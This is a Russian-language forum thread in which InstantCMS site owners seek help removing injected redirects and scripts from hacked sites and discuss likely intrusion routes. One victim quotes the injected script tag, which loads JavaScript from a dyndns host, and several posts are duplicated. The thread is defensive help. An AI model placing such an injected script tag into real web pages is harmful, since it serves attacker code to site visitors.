#1
16 октября 2011 в 22:52
Такая проблема при переходе на сайт tusavgorode.ru при его загрузке перекидывает на другой сайт.вот ссылка куда перекидывает 11233.bodisparking.com/webantispiders.ce.ms что это может быть? как бороться? спасибо.
Вирус.Что это вирус?
Лечите свой компьютер, смените пароли на доступ к серверу и перезалейте файлы instantcms.
#3
16 октября 2011 в 23:28
На хостинге проверте- не включен ли редирект Вашего домена на какой нить другой! Ну пароли естественно смените сразу же )
Сегодня в 21:40
#4
16 октября 2011 в 23:32
у вас в самом низу есть
попробуйте удалить с темплате (если оно конечно там)
если не найдете — попробуйте перевести на дефлотный шаб — проблема должна исчезнуть — если исчезнет хорошо проверте файлы того шаблона что сейчас установлен)
Либо сами поставили какойто скрипт! который вызывает редирект)
если не найдете — попробуйте перевести на дефлотный шаб — проблема должна исчезнуть — если исчезнет хорошо проверте файлы того шаблона что сейчас установлен)
Либо сами поставили какойто скрипт! который вызывает редирект)
#5
16 октября 2011 в 23:59
Не там. Время генерации страницы выводится уже после вывода шаблона,попробуйте удалить с темплате (если оно конечно там)
а iframe прописан уже после него.
Скорее всего то что мы видим в index.php
но это не значит что только там.
#6
17 октября 2011 в 22:13
нашел в index.php спасибо за помошь как они это сделали?
#7
17 октября 2011 в 22:29
проверь еще папки image на непонятные файлы и смотри, чтобы html весил 0 кб
#8
18 октября 2011 в 00:16
Каким-то образом получили доступ к файлам сервера.… как они это сделали?
Выберете сами вариант который вам ближе:
— вирус на вашем компе отослал "хозяину" сохраненные логин и пароль к серверу,
— лёгкий логин-пароль были подобраны брутфорсом,
— залит шел через уязвимость на каком-либо вашем сайте.
PS. Если вы не сделали действия описанные мной во втором посте все может повториться.
PS2. Не забывайте про бэкапы.
#9
5 октября 2012 в 12:22
здравствуйте. Борюсь с вирусами на сайте уже несколько дней, устала сил нет, не спала уже 36 часов ПОМОГИТЕ люди добрые
Вирус вылазит внизу страницы с лицевой стороны сайта (в админке нет) при просмотре исходного кода страницы внизу после тэга </html> появляются скрипты, первый исчез после чистки папки cash на сайте, день все было в порядке, и вот снова цитирую:
</html>
<script src="http://dfdfhhgrghjhjh.dyndns.tv/counter.js.php" type="text/javascript"></script>
я искала в папках, файлах, скидывала папки и файлы по ftp проверяла notepad++ и norton commander и ни чего не нашла… Где искать этот гадский скрипт, кто занет подскажите, кто может исправить отпишите в личку, поговорим о цене вопроса. Пожалуйста.
Вирус вылазит внизу страницы с лицевой стороны сайта (в админке нет) при просмотре исходного кода страницы внизу после тэга </html> появляются скрипты, первый исчез после чистки папки cash на сайте, день все было в порядке, и вот снова цитирую:
</html>
<script src="http://dfdfhhgrghjhjh.dyndns.tv/counter.js.php" type="text/javascript"></script>
я искала в папках, файлах, скидывала папки и файлы по ftp проверяла notepad++ и norton commander и ни чего не нашла… Где искать этот гадский скрипт, кто занет подскажите, кто может исправить отпишите в личку, поговорим о цене вопроса. Пожалуйста.
famalinka, напишите в личку сайт и информацию, которую посчитаете нужной
#11
5 октября 2012 в 15:42
здравствуйте. Борюсь с вирусами на сайте уже несколько дней, устала сил нет, не спала уже 36 часов ПОМОГИТЕ люди добрые
Вирус вылазит внизу страницы с лицевой стороны сайта (в админке нет) при просмотре исходного кода страницы внизу после тэга появляются скрипты, первый исчез после чистки папки cash на сайте, день все было в порядке, и вот снова цитирую:
я искала в папках, файлах, скидывала папки и файлы по ftp проверяла notepad++ и norton commander и ни чего не нашла… Где искать этот гадский скрипт, кто занет подскажите, кто может исправить отпишите в личку, поговорим о цене вопроса. Пожалуйста.
Если вирус вылазит на всех страницах то 70% что заражен либо index.php либо jquery
#12
5 октября 2012 в 16:12
AtlantisWeb, там проблема была в неправильных правах на папки и дырявом редакторе fckkeditor. И без index.php не обошлось, в него был встроен посторонний код)
SJen, пожалуйста, подробнее — неправильные права — это какие? Очень актуально!
Точнее, какие должны быть, и какие папки по Вашему мнению — наиболее критичны?
ПРосто 2 месяца назад мне пришлось положить очень крупный сайт на Битриксе, по причине того, что с локального компа про… ли вирус, котрый сдал ФТП пароли и ВСЕ! ява-скрипты сайта оказались заражжены после этого… Не хочу второго кошмара но у же на Инстанте…
Точнее, какие должны быть, и какие папки по Вашему мнению — наиболее критичны?
ПРосто 2 месяца назад мне пришлось положить очень крупный сайт на Битриксе, по причине того, что с локального компа про… ли вирус, котрый сдал ФТП пароли и ВСЕ! ява-скрипты сайта оказались заражжены после этого… Не хочу второго кошмара но у же на Инстанте…
#14
6 октября 2012 в 04:37
да об этом уже писали в блогах и на форуме..
Fuze — instantcms.ru/blogs/kollektivnyi-razum/bezopasnost-vashego-saita.html (пункты 2-6 актуальны и сейчас)
мой пост — instantcms.ru/blogs/poleznosti-ot-sjen/tehnika-bezopasnosti-ili-antishel.html
Fuze — instantcms.ru/blogs/kollektivnyi-razum/bezopasnost-vashego-saita.html (пункты 2-6 актуальны и сейчас)
мой пост — instantcms.ru/blogs/poleznosti-ot-sjen/tehnika-bezopasnosti-ili-antishel.html
#15
6 октября 2012 в 05:42
Мне кажется, чтобы таких вопросов возникало меньше, надо инструкцию по правам на папки положить в пакет с дистрибутивом